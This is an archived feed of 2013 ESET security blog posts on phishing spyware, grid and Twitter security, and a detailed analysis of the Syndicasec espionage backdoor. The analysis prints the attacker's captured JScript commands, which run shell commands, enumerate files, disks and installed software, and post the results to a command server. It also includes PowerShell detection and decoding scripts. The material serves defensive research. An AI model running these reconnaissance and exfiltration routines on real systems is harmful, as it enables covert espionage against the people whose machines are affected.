We Live Security (http://www.welivesecurity.com): News, Views, and Insight from the ESET Security Community. Feed dated Fri, 24 May 2013 16:29:27 +0000.

Tax Returns: Slovakian spyware campaign
Robert Lipovsky, Fri, 24 May 2013 12:08:10 +0000
http://www.welivesecurity.com/2013/05/24/tax-returns-slovakian-spyware-campaign/

ESET’s Security Research Lab details a malware-spreading campaign leveraging the deadline for tax returns in Slovakia and examines a case of infection where a bank's two-factor authentication prevented financial loss.

ESET’s Security Research Lab has been monitoring a malware-spreading campaign based around the March deadline for tax returns in Slovakia. Whilst this was mostly a local attack, the case demonstrates how effective and dangerous such social engineering attacks can be in general when trending topics, or other credibility-adding-tricks, are used.

The Spreading Campaigns

The attack vector in the two campaigns that we discovered was e-mail purporting to be from the Slovak Tax Office (equivalent to the Internal Revenue Service in the US, or the UK’s HM Revenue and Customs). Screenshots of the HTML-formatted e-mails used are shown below.

The translated subject of the emails read “Notification of real estate tax changes”, and the text, written in proper Slovak, states that payment instructions are to be found in the included attachment. It is interesting to note that this social engineering approach was made more credible by the fact that each taxable entity in the Slovak Republic must use a unique bank account for tax payment. The attacker was not just fluent in Slovak but also well enough acquainted with local tax legislation to devise such a believable scam.

The attacker modified the delivery method slightly in between the two spam campaigns, but the malware served up in the campaign remained the same.

The first wave of emails offered the “attachments” as download links (on a popular file-sharing service) to one of two files, each in a different format: an RTF file that masqueraded as a Microsoft Word document or an executable file. The RTF file contained an exploitation of CVE-2010-3333 which, if successful, also delivered the malicious executable. The good news was that, according to the file-sharing download statistics, the success rate of the exploit downloading the malware was less than 10%. Unfortunately, many people still opted to download the executable directly from the second (backup) link in the email, perhaps after seeing a garbled-looking document.

The second campaign was more straightforward and, according to download statistics, more successful. The hypertext link in the email pointed to an executable file (with a .SCR extension), without explicitly mentioning the file format.

The Malware

The malware used in these attacks was an ordinary credentials-stealing Trojan, which was already detected prior to these campaigns. ESET’s software detects it as Win32/Sazoora.A.

Win32/Sazoora.A is designed to steal a victim’s logon credentials from web browsers. Specifically, the Trojan contains libraries for injecting into Internet Explorer, Mozilla Firefox or Google Chrome. Win32/Sazoora implements several data-stealing techniques:

  • Intercept any information entered into HTML forms in the aforementioned browsers
  • Extract stored credentials from the browsers
  • Inject fraudulent HTML code into webpages in order to steal credit-card related data

The stolen data is then periodically sent to a remote server (the URLs of which are hard-coded in the binary). The following screenshots show the HTML web-injects used to lure the victim into entering his credit-card credentials.

The last screenshot – of a payment form for Microsoft Windows Updates – is particularly interesting. None of the techniques mentioned above is novel; they are commonly used by banking Trojans such as the infamous Zeus and SpyEye families. Unlike those families, however, Win32/Sazoora.A is configured far less dynamically: both the Command & Control server addresses and the web-inject HTML are hard-coded in the analyzed binary.

ESET LiveGrid® detection rates for Win32/Sazoora indicate that the Trojan was mostly seen in Slovakia (over 60% of all detections), undoubtedly as a result of these campaigns. The country with the second highest number of detections is Switzerland, but it is important to note that Sazoora is a generic information stealing Trojan, not customized in the Slovak attacks in any way, except for the C&C server address, so the Swiss detections may just indicate that the actual author of the malware has sold it to multiple clients.

The Victims

Our telemetry indicates that many of the targets successfully infected through malware-spreading emails weren’t accidental or purely random. The emails were mass distributed using a generic list of hopefully-Slovak e-mail addresses. And as it turned out, some of the victims identified so far include physicians, accountants and several institutions. These were considerably more likely to click on the links, as the content of the e-mail was relevant to their profession (and also the upcoming tax deadlines made it even more likely for them to check the content).

We have also performed a detailed analysis of one victim’s infected computer at their request after they noticed suspicious activity relating to their bank account. It turned out that they received one of the aforementioned emails, were infected by Win32/Sazoora.A and had their online banking credentials stolen. The most interesting thing about this infection, however, was the fact that the attacker was prevented from stealing any money from the victim’s account by the bank account’s grid-card protection, a kind of multifactor authentication. The attacker then sent the victim a phishing email passed off as some kind of client verification by the bank, in which they asked for a specified code from the grid-card. The victim was not fooled by this attempt.

Other victims may not have been so fortunate. This case again confirms the necessity for employee education with regard to phishing (and information security in general), especially when the employees handle sensitive corporate or customer data.

Kudos to Peter Košinár, David Gabriš and Miro Babiš for their work on the case.

“Stronger action” urged in face of IP theft from American companies
Editor, Fri, 24 May 2013 10:08:54 +0000
http://www.welivesecurity.com/2013/05/24/american-companies-face-unprecedented-onslaught-of-data-theft/

American companies are facing an “unprecedented” onslaught of data theft, costing “hundreds of billions”, according to a report by a private group headed by high-ranking ex-government officials. The report recommends a number of countermeasures, including a suggestion that companies could use electronic means to recover stolen IP.

The Commission on the Theft of American Intellectual Property includes former government officials such as Dennis Blair, the former U.S. Director of National Intelligence.

“The scale of international theft of American intellectual property (IP) is unprecedented – hundreds of billions of dollars per year, on the order of the size of US exports to Asia,” the report said.  “The Commission judges that the scope of the problem requires stronger action, involving swifter and more stringent penalties for IP theft.”

The report recommended that the U.S. should, “Support American companies and technology that can both identify and recover IP stolen through cyber means. Without damaging the intruder’s own network, companies that experience cyber theft ought to be able to retrieve their electronic files or prevent the exploitation of their stolen information.”

The report described China as “the world’s largest source of IP theft”. “National industrial policy goals in China encourage IP theft, and an extraordinary number of Chinese in business and government entities are engaged in this practice,” the report said.

Electrical grids “woefully prepared” for cyber attacks, warns analyst
Editor, Fri, 24 May 2013 04:59:29 +0000
http://www.welivesecurity.com/2013/05/24/electrical-grid-woefully-prepared-for-cyber-attacks-warns-analyst/

Electrical grids worldwide have become more susceptible to cyber attacks due to the use of industrial control systems, according to market analysts ABI Research.

Spending on cybersecurity to protect infrastructure will total $2.9 billion by the end of 2013, the analyst claims.

“The restructuring of the power sector and the emergence of the smart grid has largely ignored the issue of cyber security,” ABI Research claims in a report this week, which described electrical firms as “woefully” prepared for attacks. “Industrial control systems have poor methods of authentication, little encryption, and are not often capable of detecting intrusions. By failing to address cyber security, and focusing on the cost-savings and gained efficiencies of a market-oriented model, the susceptibility to cyber attacks has grown.”

This week the Wall Street Journal reported that hackers had penetrated systems belonging to energy companies in the U.S. Quoting unnamed sources, the WSJ claims that Iranian hackers proceeded “far enough to worry people.”

“Cyber-attacks that can cause serious damage to electrical grids are a reality. Operators need to view cyber security as a core, integrated requirement of their offering and not as a secondary add-on,” says Michela Menting, ABI Research’s senior analyst for cyber security.

Menting says that government efforts to tackle vulnerabilities are raising awareness of the issue, and that companies such as Alliander, Enel, and E.On Nordic have already “made significant efforts at implementing a cybersecurity culture”.

A Congressional survey of electrical utilities this week found that companies faced up to 10,000 attacks per month. Out of 53 companies surveyed, more than a dozen described attacks on their systems as “daily” or “constant”. One company complained of being under a “constant state of ‘attack’ from malware and entities seeking to gain access to internal systems.”

This April, a spear-phishing attack which targeted an American electrical company was documented in this month’s Monitor report from the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT).

Syndicasec in the Sin Bin: targeted espionage malware in action
Alexis Dorais-Joncas, Thu, 23 May 2013 10:02:23 +0000
http://www.welivesecurity.com/2013/05/23/syndicasec-in-the-sin-bin/

Technical analysis of Win32/Syndicasec.A, malware active in Nepal and China as far back as 2010, with a JavaScript payload registered in the Windows WMI subsystem and a system of fake blogs to discover its C&C servers, hosted on Tibet-related domains.

Malware researchers receive so many malicious code samples every day that prioritization for deep examination becomes an important part of the analysis process. In some instances, it is easier to decide than others. Such is the case for a sample we recently came across here at ESET named Win32/Syndicasec.A, for which the decision was pretty easy, for a variety of reasons:

  • Our telemetry systems show that the infection scale is extremely small and strictly limited to Nepal and China. Previous versions of this threat were identified dating back to 2010.
  • The main payload is a piece of Javascript code registered in the Windows WMI subsystem, an unusual technique.
  • The threat uses fake blogs to discover its C&C servers, which are hosted on Tibet-related domains.
  • The commands sent to our test machine, infected for the purpose of this investigation, were sent manually by the attacker and consisted of collecting information from the filesystem and the registry.
  • The characteristics of this operation are very similar to previous campaigns of espionage against Tibetan activists such as OS X Lamadai and others.

Read on to learn the details about the installation and persistence mechanisms used by this malware and its native capabilities and communication protocol. We will also present the bot behavior we observed during our analysis and conclude with some background research about the threat and the domains and IP addresses with which it is associated.

Installation & Persistence

Win32/Syndicasec uses an exploit to get access to a target computer in the first instance. Our engine successfully stopped the exploitation attempt but was unable to capture the original exploit itself. Upon successful exploitation, a two-stage installation process begins.

The stage 1 dropper makes a few sanity checks on the system. It will look for the presence of %SYSTEM32%\sysprep.exe: if that is present, a cabinet archive (.cab) will be copied into the %TEMP% folder and its content (a single library) will be installed to %SYSTEM32%\cryptbase.dll using the standard Windows Update Standalone installer (wusa.exe):

The Cabinet file is stored unobfuscated inside the dropper. Only the Cabinet file header is missing: this is dynamically corrected in memory prior to writing the file on disk.

The dropper then attempts to exploit a vulnerability in Microsoft’s User Account Control (UAC) whitelisting process to run arbitrary commands with elevated privileges. This topic is well described by Leo Davidson.

Inspecting the cryptbase.dll file reveals that it is a compiled version of Leo’s proof-of-concept code, right down to the exact return value of DllMain(), which is -69.

This technique is one of the privilege escalation techniques used by Win32/Rootkit.Avatar, an advanced rootkit analyzed recently by our colleagues Anton Cherepanov and Aleksandr Matrosov.

Inside the library, we can see a path related to the compilation project. We were not able to find any meaning to the “psm2” project name.

Once this step has been performed, the second stage dropper is stored on disk as %TEMP%\gupdate.exe. If sysprep.exe is present on the system, the file is launched by a call to sysprep.exe, leveraging the UAC whitelist vulnerability previously explained. Otherwise, gupdate.exe is simply executed by a call to cmd.exe.

Gupdate.exe is in charge of installing the real payload on the system. The technique used is one we rarely see in the wild and is based on the WMI subsystem; it was well documented by Julius Dizon et al. of Trend Micro in their excellent technical whitepaper available here. This same technique was also seen used by Stuxnet.

This technique has the excellent property (from the attacker’s point of view) of not requiring any malicious code to be stored as a regular file on disk. This causes standard dynamic analysis tools such as Process Monitor to fail to clearly highlight the malicious activity.

Here is how the final payload is persistently installed on a victim’s system. First, a piece of JavaScript is decrypted by gupdate.exe using a simple XOR operation:

Then, the proper WMI classes are created.

1. __TimerInstruction

Win32/Syndicasec creates a __TimerInstruction to raise a custom event named “ProbeScriptInit” every 60,000 milliseconds.

2. __EventFilter

The __EventFilter class is responsible for linking the custom timer to the malicious code contained in the __EventConsumer element described below.

3. __EventConsumer

This class contains the malicious code to be executed every time the __TimerInstruction raises an event.

These objects are permanently registered in the root\subscription namespace, thus ensuring stealth and persistence.
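The persistence objects described above leave nothing for file-based tooling to find, but they are easy to enumerate through WMI itself. The PowerShell below is an added example for this write-up, not code from ESET or from the malware: it inventories root/subscription and flags the shape of this persistence. __FilterToConsumerBinding (the standard object that ties a filter to a consumer), __IntervalTimerInstruction, __TimerEvent and ActiveScriptEventConsumer are standard WMI classes not named in the post; the function names and output layout are this example's own, and it assumes the CIM cmdlets (Windows PowerShell 3.0 or later) in an elevated session.

```powershell
# Added example, not ESET's or the malware's code. Assumes the CIM cmdlets (Windows
# PowerShell 3.0+ or PowerShell 7) and an elevated session so every instance is visible.

function Get-WmiSubscriptionInventory {
    param([string]$Namespace = 'root/subscription')

    # __EventConsumer and __TimerInstruction are abstract base classes; enumerating them
    # returns every derived instance (ActiveScriptEventConsumer, CommandLineEventConsumer,
    # __IntervalTimerInstruction, ...), so a consumer cannot hide behind its class name.
    $classes = '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding', '__TimerInstruction'

    foreach ($class in $classes) {
        Get-CimInstance -Namespace $Namespace -ClassName $class -ErrorAction SilentlyContinue |
            ForEach-Object {
                $inst = $_                       # switch rebinds $_, so keep a named copy
                $kind = $inst.CimClass.CimClassName
                $name = if ($inst.PSObject.Properties['Name']) { $inst.Name } else { $inst.TimerId }
                $detail = switch ($kind) {
                    '__EventFilter'              { $inst.Query }
                    'ActiveScriptEventConsumer'  { $inst.ScriptText }
                    'CommandLineEventConsumer'   { $inst.CommandLineTemplate }
                    '__FilterToConsumerBinding'  { "$($inst.Filter) -> $($inst.Consumer)" }
                    '__IntervalTimerInstruction' { "$($inst.TimerId) every $($inst.IntervalBetweenEvents) ms" }
                    default                      { '' }
                }
                [pscustomobject]@{ Class = $kind; Name = $name; Detail = $detail }
            }
    }
}

function Find-SuspiciousWmiSubscription {
    param([object[]]$Inventory)

    # Three signals taken from the analysis: a script consumer (the payload lives in
    # ScriptText, never on disk), a timer named ProbeScriptInit, and a filter that
    # subscribes to __TimerEvent, which is how a timer instruction reaches a consumer.
    foreach ($item in $Inventory) {
        $reason = $null
        if ($item.Class -eq 'ActiveScriptEventConsumer') {
            $reason = 'script consumer present; read ScriptText'
        } elseif ($item.Name -eq 'ProbeScriptInit') {
            $reason = 'timer name matches Syndicasec'
        } elseif ($item.Class -eq '__EventFilter' -and $item.Detail -match '__TimerEvent') {
            $reason = 'filter fires on a WMI timer'
        }
        if ($reason) { [pscustomobject]@{ Class = $item.Class; Name = $item.Name; Reason = $reason } }
    }
}

# Usage: print the full inventory, then only the entries that match the Syndicasec shape.
$inventory = @(Get-WmiSubscriptionInventory)
$inventory | Format-Table -AutoSize
Find-SuspiciousWmiSubscription -Inventory $inventory | Format-Table -AutoSize
```

On a clean Windows host the inventory is short and contains only built-in objects, so any ActiveScriptEventConsumer or timer-driven filter deserves to be read in full. Cleanup is Remove-CimInstance on the binding first, then the consumer and the filter, so that a half-removed subscription cannot keep firing.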

Malware capabilities & network communication

Let’s have a look now at the malicious script contained in the __EventConsumer object. The code is straightforward to analyze and almost self-documenting once properly formatted.

First, one of the hardcoded URLs is randomly chosen and contacted via a standard HTTP GET. We’ll call these the Stage One URLs. All the hardcoded URLs lead to an RSS feed for a fake blog seen here:

The key element in this RSS feed is the <title> tag, which contains an encrypted string inside two ‘@’ delimiters.

The script code shows which decoding routine is used to decrypt this string:

The decrypted string reveals another URL, which we will call a Stage Two URL. These URLs provide the address of the C&C and are used to retrieve commands and post results.

The initial communication sent to a Stage Two URL is an HTTP POST request containing some basic information about the infected machine. The response to this request is an HTML div element that may contain one or more commands.

Static analysis shows that a populated command array consists of obfuscated Javascript that gets directly eval()’ed by the master script. There are no built-in functions in the master script, so at this point we cannot tell what this malware is being used for.

Observed activity

In parallel with analysis of the code, we started to monitor the behavior of a test machine that we infected with Win32/Syndicasec. The first few days of monitoring showed no activity whatsoever. We then started receiving commands from the C&C. The interaction between the C&C and the bot did not look to be automated at all. Every day would bring different commands sent at non-regular time intervals, making it look just as if someone was sitting behind a console and manually controlling infected hosts.

Here is an excerpt from one of the first sessions with the C&C we observed. If you pay attention to the timestamps, the entire list of commands was spread over more than 30 minutes. Note that each command includes all the Javascript needed to execute the entrypoint function. We have included the entire code for only a few interesting calls for the sake of brevity.

Commands that have the same timestamp were received in the same command array.

21:40:36 function getDataString(b) {
    var a = [];
    for (var i = 0; i < b.length; i++) { a.push(255 - b.charCodeAt(i)) }
    var s = String.fromCharCode.apply(null, a);
    var c = $.oShell.ExpandEnvironmentStrings("%Temp%") + '\\KB2761465-IE8.bin';
    $.oStream.Mode = 3; $.oStream.Open(); $.oStream.Type = 2; $.oStream.Charset = 'iso8859-1';
    $.oStream.WriteText(s); $.oStream.SaveToFile(c, 2); $.oStream.Close();
    $.oStream.Type = 1; $.oStream.Open(); $.oStream.loadfromfile(c);
    var d = $.oStream.Read(); $.oStream.Close();
    return d
};
function EnumDisk() {
    var e = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
    t = new Enumerator(e.ExecQuery("select * from Win32_LogicalDisk"));
    var s = '';
    while (!t.atEnd()) s += '{"Name":"' + t.item().Caption + '","DriveType":"' + t.item().DriveType + '"},', t.moveNext();
    if (s.length > 0) s = s.substr(0, s.length - 1);
    $.oHttp.Open("POST", $.sXmlUrl + "?" + $.sURLParam + "&command=offlineresult&commandid=" + commands[i].id, !1);
    $.oHttp.setRequestHeader("CONTENT-TYPE", "file");
    $.oHttp.Send(getDataString('[' + s + ']'));
    return ""
};
EnumDisk();


21:41:37 ExpandDirectory('C:\\');
21:41:37 function ExecuteCommand(a) {
    var b = 'asdfasfasfasdfsdfasdfsadf';
    var c = $.oShell.exec('%ComSpec%');
    c.StdIn.writeline(a);
    c.StdIn.writeline(b);
    var d = '';
    while (!c.StdOut.AtEndOfStream) {
        var e = c.StdOut.ReadLine();
        if (e.match(b)) { d += e.replace(b, '') + '\r\n'; break }
        d += e + '\r\n'
    }
    $.oHttp.Open('POST', $.sXmlUrl + '?' + $.sURLParam + '&command=offlineresult&commandid=' + commands[i].id, false);
    $.oHttp.setRequestHeader('CONTENT-TYPE', 'file');
    $.oHttp.Send(getDataString(d));
    return
};
ExecuteCommand('system32info');
21:42:37 ExpandDirectory('C:\\Documents and Settings\\');
21:42:37 ExecuteCommand('systeminfo');
21:45:07 ExpandDirectory('C:\\Documents and Settings\\All Users\\');
21:45:07 ExecuteCommand('net start');
21:45:36 ExpandDirectory('C:\\Documents and Settings\\All Users\\Desktop\\');
21:46:37 ExecuteCommand('tasklist');
21:46:37 ExpandDirectory('C:\\Documents and Settings\\user\\');
21:47:37 ExpandDirectory('C:\\Documents and Settings\\All Users\\Recent\\');
21:48:48 ExpandDirectory('C:\\Documents and Settings\\All Users\\.idlerc\\');
21:48:48 ExecuteCommand('net view');
21:51:36 ExecuteCommand('net use');
21:52:38 ExpandDirectory('C:\\Documents and Settings\\All Users\\My Documents\\');
22:07:37 ExpandDirectory('C:\\Documents and Settings\\All Users\\Recent\\');
22:10:38 ExpandDirectory('C:\\Documents and Settings\\user\\');
22:13:38 EnumDisk();
22:13:38 ExpandDirectory('C:\\');
22:14:39 ExpandDirectory('C:\\Documents and Settings\\user\\');
22:14:39 ExpandDirectory('C:\\Documents and Settings\\All Users\\Recent\\');
22:14:39 ExpandDirectory('C:\\Documents and Settings\\All Users\\Recent\\');

Basically, the operator was browsing our filesystem and looking at detailed settings and operations on the infected machine, such as network settings, attached drives and running programs.
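The getDataString() routine in the transcript above defines the bot's upload encoding: every character of a result is written as 255 minus its character code, saved as ISO-8859-1 and sent as the body of the offlineresult POST. The PowerShell below is an added example, not code from ESET or from the malware: it reverses that encoding for captured POST bodies and picks beacon lines out of a proxy log by the command=offlineresult&commandid= query string present in every upload. The log line format, the host names and the ver= parameter are constructed for the example (the path echoes the ieupdate.php seen in the old Stage Two URL); the C&C's real query string beyond those two parameters is not shown in the post.

```powershell
# Added example, not ESET's or the malware's code. Assumes Windows PowerShell 3.0+ or
# PowerShell 7; no network access is needed because the inputs are constructed inline.

function ConvertFrom-SyndicasecResult {
    # Reverse getDataString(): the bot stores 255 - charCode for each character and
    # writes the result as ISO-8859-1, so 255 - byte recovers the original character.
    param([Parameter(Mandatory)][byte[]]$Body)
    $plain = New-Object byte[] $Body.Length
    for ($i = 0; $i -lt $Body.Length; $i++) { $plain[$i] = 255 - $Body[$i] }
    return [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($plain)
}

function ConvertTo-SyndicasecResult {
    # Forward direction of the same transform, used here only to build a fixture.
    param([Parameter(Mandatory)][string]$Text)
    $raw = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetBytes($Text)
    return [byte[]]($raw | ForEach-Object { 255 - $_ })
}

function Find-SyndicasecBeacon {
    # The query string of every upload carries command=offlineresult&commandid=<n>;
    # that pair is the cheapest network indicator visible in the transcript.
    param([string[]]$LogLines)
    foreach ($line in $LogLines) {
        if ($line -match 'command=offlineresult&commandid=(\d+)') {
            [pscustomobject]@{ CommandId = [int]$Matches[1]; Line = $line }
        }
    }
}

# Constructed fixture: the JSON EnumDisk() would build on a host with one fixed disk
# and one CD-ROM drive (DriveType 3 and 5 in Win32_LogicalDisk).
$diskJson = '[{"Name":"C:","DriveType":"3"},{"Name":"D:","DriveType":"5"}]'
$wire = ConvertTo-SyndicasecResult -Text $diskJson
$decoded = ConvertFrom-SyndicasecResult -Body $wire
if ($decoded -ne $diskJson) { throw 'round trip failed' }
$decoded

# Constructed proxy log lines; the host names and the ver= parameter are invented.
$sampleLog = @(
    '2013-04-20 21:40:37 10.1.2.3 POST http://c2.example.invalid/ieupdate.php?ver=1.2.0&command=offlineresult&commandid=12 200',
    '2013-04-20 21:40:40 10.1.2.3 GET  http://blog.example.invalid/feeds/posts/default 200',
    '2013-04-20 21:41:38 10.1.2.3 POST http://c2.example.invalid/ieupdate.php?ver=1.2.0&command=offlineresult&commandid=13 200'
)
Find-SyndicasecBeacon -LogLines $sampleLog | Format-Table -AutoSize
```

The decoder takes raw bytes, so feed it the POST body exported from a packet capture rather than a text rendering of it; the transform is its own inverse, which is why a single round trip is enough to validate it. Where the proxy records request headers, the literal CONTENT-TYPE: file header set by every upload routine is a second indicator worth alerting on.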

The day after this visit, the operator sent another set of commands to gather some system information specific to our infected system.

22:34:50 function EnumInstaller() {
    var s = '';
    var a = 0x80000002;
    var b = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\";
    var c = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
    var d = c.Methods_.Item("EnumKey");
    var e = d.InParameters.SpawnInstance_();
    e.hDefKey = 0x80000002;
    e.sSubKeyName = b;
    var f = c.ExecMethod_(d.Name, e);
    var g = new Enumerator(f.sNames.toArray());
    while (!g.atEnd()) {
        var h = g.item();
        d = c.Methods_.Item("GetStringValue");
        e = d.InParameters.SpawnInstance_();
        e.hDefKey = 0x80000002;
        e.sSubKeyName = b + h;
        e.sValueName = "DisplayName";
        f = c.ExecMethod_(d.Name, e);
        var j = f.sValue;
        e.sValueName = "UninstallString";
        f = c.ExecMethod_(d.Name, e);
        var k = f.sValue;
        e.sValueName = "InstallDate";
        f = c.ExecMethod_(d.Name, e);
        var l = f.sValue;
        e.sValueName = "InstallLocation";
        f = c.ExecMethod_(d.Name, e);
        var m = f.sValue;
        s += '{' + '"InstallerName":"' + h + '","DisplayName":"' + j + '","UninstallString":"' + escape(f.sValue) + '","InstallDate":"' + l + '","InstallLocation":"' + escape(m) + '"},';
        g.moveNext()
    }
    if (s.length > 0) s = s.substr(0, s.length - 1);
    $.oHttp.Open('POST', $.sXmlUrl + '?' + $.sURLParam + '&command=offlineresult&commandid=' + commands[i].id, false);
    $.oHttp.setRequestHeader('CONTENT-TYPE', 'file');
    $.oHttp.Send(getDataString('[' + s + ']'));
    return
};
EnumInstaller();

22:34:50 ExpandDirectory('C:\\Documents and Settings\\All Users\\DRM\\');
22:35:35 ExpandDirectory('C:\\Python27\\Tools\\');
22:36:35 EnumDisk();
22:37:39 function EnumProduct() {
    var a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
    var b = new Enumerator(a.ExecQuery("Select * from Win32_Product"));
    var s = '';
    while (!b.atEnd()) {
        var c = b.item();
        s += '{' + '"ProductName":"' + c.Name + '","InstallLocation":"' + escape(c.InstallLocation) + '","PackageCache":"' + escape(c.PackageCache) + '"},';
        b.moveNext()
    }
    if (s.length > 0) s = s.substr(0, s.length - 1);
    $.oHttp.Open('POST', $.sXmlUrl + '?' + $.sURLParam + '&command=offlineresult&commandid=' + commands[i].id, false);
    $.oHttp.setRequestHeader('CONTENT-TYPE', 'file');
    $.oHttp.Send(getDataString('[' + s + ']'));
    return
};
EnumProduct();
22:37:39 EnumProcess();
22:39:36 ExpandDirectory('C:\\Documents and Settings\\Default User\\Start Menu\\');
22:41:36 ExpandDirectory('C:\\Documents and Settings\\Default User\\Start Menu\\Programs\\');
22:41:36 EnumDisk();
22:41:36 ExpandDirectory('C:\\Documents and Settings\\All Users\\Start Menu\\');
22:42:35 ExpandDirectory('C:\\Documents and Settings\\All Users\\My Documents\\');
22:47:35 ExecuteCommand('dir c:\\');
22:48:35 ExecuteCommand('dir /a/s c:\\program files\\');
22:48:35 ExecuteCommand('dir c:\\dir c:');
22:53:38 ExecuteCommand('dir /a/s c:\\progra~1');
22:56:36 ExpandDirectory('C:\\Documents and Settings\\Default User\\Local Settings\\');
22:57:37 EnumDisk();
23:03:35 ExecuteCommand('systeminfo');

In this session, the commands sent by the operator had roughly the same purpose, but were issued differently, strongly suggesting a different operator from the one on the previous day. We also note some sort of typo or bug in this line:

ExecuteCommand('dir c:\\dir c:');

The Stage Two URLs remained unchanged until 2013-04-22. The three blog entries in the hardcoded Stage One URLs were all changed on that same day within a 30-minute window to direct infected systems to a new Stage Two domain: nedfortibt.info. Details of this new domain can be found in the next section.

Malware history

Now that we know how the malware gets installed on a target system and what capabilities it offers to the attacker, let’s establish some context around this threat.

First, we were able to find a version of the master script dating from July 2010, uploaded to an online Javascript analyzer. The screenshot below shows some differences in the first few lines of the script. We can clearly see the version number evolution, passing from 0.5.2 to a 1.2.0 release.

When further analyzing the differences between the two versions, we can see that the encryption present in the <title> tag of the Stage One RSS feed did not change. On the other hand, the commands sent from the C&C went from cleartext to being encrypted in version 1.2.0 of the script (see the circleDecode() function):

Finally, we can see that the old version performs the WMI calls needed to register itself in the root\subscription namespace, while version 1.2.0 depends on its dropper to perform this step.

The old script contains only one hardcoded Stage One URL, which is still active at the time of writing.

We can see that only twenty-five (25) users have visited this page since it was posted in September 2010. The decrypted <title> tag reveals an inactive Stage Two URL (http://<redacted>.hostaim.com/summer/ieupdate.php).

Another piece of information was also found using the same Javascript analyzer. We can see a dialogue between an infected host and a C&C dating from 2012. The query string reveals that the infected host is running version 1.01 of the master script.

This clearly shows that this threat has been maintained and used over several years.

Let’s look now at the domains involved in this operation. The Stage One URLs all point to free blog sites and are rather uninteresting. The Stage Two URLs are more relevant and deserve closer examination.

In the course of our monitoring, we saw two active Stage Two URLs:

Domain: tbtworld.info
  Registrar: GoDaddy (Registrant Name: boorn zeroseven)
  Created On: 2012-09-18
  IP history:
    2012-11-21: 209.141.36.23 (BuyVM, Canada)
    2013-03-25 to 2013-04-19: 216.83.45.18 (Ethr.Net LLC, USA)
    after 2013-04-19: 195.43.45.18 (Routo Telecom, UK)

Domain: nedfortibt.info
  Registrar: GoDaddy (Registrant Name: Tsering Duoten)
  Created On: 2013-04-18
  IP history:
    216.83.45.18 (BuyVM, Canada)

Related domain (found having an A record identical to tbtworld.info):

Domain: tbtsociety.info
  Registrar: GoDaddy (Registrant Name: boorn zeroseven)
  Created On: 2012-09-18
  IP history:
    2012-11-21: 209.141.36.23 (BuyVM, Canada)
    2013-04-30: 215.43.40.16 (DoD, USA)

Unlike the DoD IP, the other three IPs reveal many hundreds of domain names to which A records are pointing. Most of these domains were registered less than a year ago and point to amateur-looking websites for small businesses, all in Asian languages.

The three domains shown in the previous table also reveal a clear reference to Tibet.  The ‘ned’ in ‘nedfortibt.info’ relates to the National Endowment for Democracy organization, described on their website as: “a private, nonprofit foundation dedicated to the growth and strengthening of democratic institutions around the world. Each year, with funding from the US Congress, NED supports more than 1,000 projects of non-governmental groups abroad who are working for democratic goals in more than 90 countries.”

The NED is openly supportive of Tibetans in their uneasy relations with China.

Conclusion

This analysis showed an implementation of rather unusual techniques to build a stealthy and flexible backdoor. The lack of built-in commands prevents us from discovering the real end-goal of this operation. However, we can affirm that the various characteristics observed around this threat are similar to other espionage campaigns against Tibetan activists that we have observed.

MD5 hashes of the files analyzed:

stage1_dropper.exe      7ee6a8cc75b5e8adf64af899fabd88a4
gupdate.exe             b60ce366e142200e3191a1dffdf7283c
CryptBase.dll           c469b1010f348bd4a5bd5471ff388464

Alexis Dorais-Joncas
Security Intelligence Team Lead

 

The post Syndicasec in the Sin Bin: targeted espionage malware in action appeared first on We Live Security.

Twitter beefs up security after wave of attacks on media sites
Editor, Thu, 23 May 2013 07:18:54 +0000
http://www.welivesecurity.com/2013/05/23/twitter-adds-two-factor-security-after-wave-of-attacks-on-media-sites/

Twitter has introduced a new two-factor security system – an optional “extra layer” of security which should help to prevent unauthorised access to accounts. The move comes in the wake of a series of high-profile attacks on Twitter accounts owned by media organisations including Associated Press and the Financial Times.

The new, SMS-based system was announced via a post on the official Twitter blog.

“Today we’re introducing a new security feature to better protect your Twitter account: login verification,” said Jim O’Leary of the site’s Product Security Team in his post. “This is a form of two-factor authentication. When you sign in to twitter.com, there’s a second check to make sure it’s really you. You’ll be asked to register a verified phone number and a confirmed email address.”

“After you enroll in login verification, you’ll be asked to enter a six-digit code that we send to your phone via SMS each time you sign in to twitter.com,” O’Leary writes. The system has to be activated via Twitter’s “Account Settings” page.

ESET Senior Research Fellow David Harley says, “I’m not a fan of static passwording – in fact, I was reminded of something I’ve said before in a paper: ‘The sad fact is, static passwords are a superficially cheap but conceptually unsatisfactory solution to a very difficult problem, especially if they aren’t protected by supplementary techniques.’”

“So the gradual drift towards two-factor by social media sites is encouraging, though I doubt that too many people will take advantage of such facilities while they’re just optional. In fact, Twitter did take a more forceful approach a few years ago by preventing people from using any passwords from its own blacklist of the most stereotyped passwords: I referred to it in a paper on PINs and passwords.”

Pressure on Twitter to improve security has grown in recent weeks, after a spate of incidents including an attack on the main Associated Press Twitter account where hackers sent out bogus “news” about an attack on President Obama. The AP Tweet caused panic on stock markets, wiping 143 points off the Dow Jones in minutes. Twitter previously provided media companies with guidelines on how to resist such hacks, including steps such as designating specific PCs to access company Twitter accounts.

“This release is built on top of Twitter via SMS, so we need to be able to send a text to your phone before you can enroll in login verification (which may not work with some cell phone providers). However, much of the server-side engineering work required to ship this feature has cleared the way for us to deliver more account security enhancements in the future. Stay tuned,” said O’Leary.

]]>
Small business cybercrime costs $6,000 a year, says British group http://www.welivesecurity.com/2013/05/22/small-business-cybercrime/ http://www.welivesecurity.com/2013/05/22/small-business-cybercrime/#comments Wed, 22 May 2013 13:04:09 +0000 Editor http://www.welivesecurity.com/2013/05/22/small-business-cybercrime/ Cybercrime is costing small businesses an average of £4,000 ($6000) a year, according to the British Federation of Small Businesses (FSB). A report by the group found that 41 per cent of the FSB’s membership have been a victim of cybercrime in the past year. The most common threat is virus infections, with 20% of small businesses falling victim - while 8% have been victims of hacking and 5% have suffered security breaches.

The post Small business cybercrime costs $6,000 a year, says British group appeared first on We Live Security.

]]>
Small business cybercrime costs an average of £4,000 ($6000) a year, according to the British Federation of Small Businesses (FSB).

